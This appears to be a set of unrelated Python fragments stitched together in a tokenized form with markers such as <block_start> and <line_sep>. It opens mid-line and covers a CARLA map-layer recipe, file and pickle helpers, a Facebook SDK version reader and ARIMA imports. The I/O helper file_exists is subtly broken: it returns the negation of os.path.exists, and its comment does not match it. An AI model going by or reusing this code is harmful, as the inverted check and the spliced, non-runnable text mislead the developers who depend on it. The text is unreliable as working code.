format(t1-t0 '0.6f'))<block_end><if_stmt>__name__<eq>'__main__'#test() <block_start>chronograph()<block_end>
# This recipe toggles on several layers in our "_Opt" maps # Load town one with only minimum layout (roads, sidewalks, traffic lights and traffic signs) world=client.load_world('Town01_Opt' carla.MapLayer.None)<line_sep># Toggle all buildings on world.load_map_layer(carla.MapLayer.Buildings)<line_sep># Toggle all foliage on world.load_map_layer(carla.MapLayer.Foliage)<line_sep># Toggle all parked vehicles on world.load_map_layer(carla.MapLayer.ParkedVehicles)<line_sep>
""" Some useful I/O functions """<import_stmt>os<import_stmt>pickle<import_stmt>shutil<line_sep># get all directories in a specific directory <def_stmt>get_directories path<block_start><return>[f<for>f os.listdir(path)<if>os.path.isdir(os.path.join(path f))]<block_end># get all the files in a specific directory # extension can be string or tuple of strings <def_stmt>get_files path extension=<none><block_start>files=[f<for>f os.listdir(path)<if>os.path.isfile(os.path.join(path f))]<if_stmt>extension<is><not><none><block_start>files=[f<for>f files<if>f.lower().endswith(extension)]<block_end><return>files<block_end># get all files in a specific directory <def_stmt>file_exists path<block_start><return><not>os.path.exists(path)<block_end># make directory <def_stmt>makedir path replace_existing=<false><block_start><if_stmt><not>os.path.exists(path)<block_start>os.makedirs(path)<block_end><elif_stmt>replace_existing<block_start>shutil.rmtree(path)<line_sep>os.makedirs(path)<block_end><else_stmt><block_start>print("Beware .. path {} already exists".format(path))<block_end><block_end># extract relative path from a root-directory and an absolute path <def_stmt>relative_path root path<block_start><return>os.path.relpath(path root)<block_end># save pickle <def_stmt>save_pickle path data<block_start><with_stmt>open(path "wb")<as>f<block_start>pickle.dump(data f)<block_end><block_end># load pickle <def_stmt>load_pickle path<block_start><with_stmt>open(path "rb")<as>f<block_start><return>pickle.load(f)<block_end><block_end>
# Copyright 2014 Facebook, Inc. # You are hereby granted a non-exclusive, worldwide, royalty-free license to # use, copy, modify, and distribute this software in source code or binary # form for use in connection with the web services and APIs provided by # Facebook. # As with any software that integrates with the Facebook platform, your use # of this software is subject to the Facebook Developer Principles and # Policies [http://developers.facebook.com/policy/]. This copyright notice # shall be included in all copies or substantial portions of the software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. """ Gets the current Facebook Python SDK version. """<import_stmt>os<import_stmt>re<def_stmt>get_version <block_start>this_dir=os.path.dirname(__file__)<line_sep>package_init_filename=os.path.join(this_dir '../__init__.py')<line_sep>version=<none><with_stmt>open(package_init_filename 'r')<as>handle<block_start>file_content=handle.read()<line_sep>version=re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]' file_content re.MULTILINE).group(1)<block_end><if_stmt><not>version<block_start><raise>ValueError('Cannot find version information')<block_end><return>version<block_end>
<import_from_stmt>.build_arima BuildArima<import_from_stmt>.build_sarimax BuildSarimax<import_from_stmt>.build_autoarimax BuildAutoSarimax<import_from_stmt>.build_var BuildVAR<line_sep>